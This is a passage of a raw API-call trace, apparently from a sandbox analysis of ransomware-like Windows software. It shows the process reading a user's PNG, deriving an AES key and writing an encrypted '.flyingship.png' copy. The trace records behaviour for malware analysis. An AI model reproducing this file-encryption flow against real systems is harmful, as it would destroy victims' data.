dwCmpFlags=0x1, lpString1="_LQhg.png\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0190.935] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.935] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0190.935] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.935] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.935] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.935] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.935] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.935] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0190.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1ac7960, ftCreationTime.dwHighDateTime=0x1d5e3d1, ftLastAccessTime.dwLowDateTime=0x6fbebf20, ftLastAccessTime.dwHighDateTime=0x1d5dac2, ftLastWriteTime.dwLowDateTime=0x6fbebf20, ftLastWriteTime.dwHighDateTime=0x1d5dac2, nFileSizeHigh=0x0, nFileSizeLow=0x3ead, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="ufXfgc_LQhg.png", cAlternateFileName="UFXFGC~1.PNG")) returned 0x90af58 [0190.936] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.936] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.936] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0190.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0190.936] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.936] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0190.937] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0190.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.937] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0190.938] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.938] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.952] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0190.952] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.953] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.953] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0190.953] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0190.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.953] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0190.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.953] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0190.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.953] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0190.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.954] CryptDestroyHash (hHash=0x90ae18) returned 1 [0190.954] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\ufxfgc_lqhg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.955] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0190.955] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.955] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0190.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0190.957] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh")) returned 0x10 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0190.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0190.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0190.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0190.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0190.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0190.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\ufXfgc_LQhg.flyingship.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\ufxfgc_lqhg.flyingship.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0190.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.960] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0190.960] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0190.960] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0190.960] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0190.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0190.961] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0190.961] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x3ead, lpOverlapped=0x0) returned 1 [0190.963] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3ead) returned 0x900190 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0190.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3ead) returned 0xbea018 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.964] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3ead) returned 0x900190 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.964] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0190.964] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0190.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.965] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2788 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0190.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3ead) returned 0x900190 [0190.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 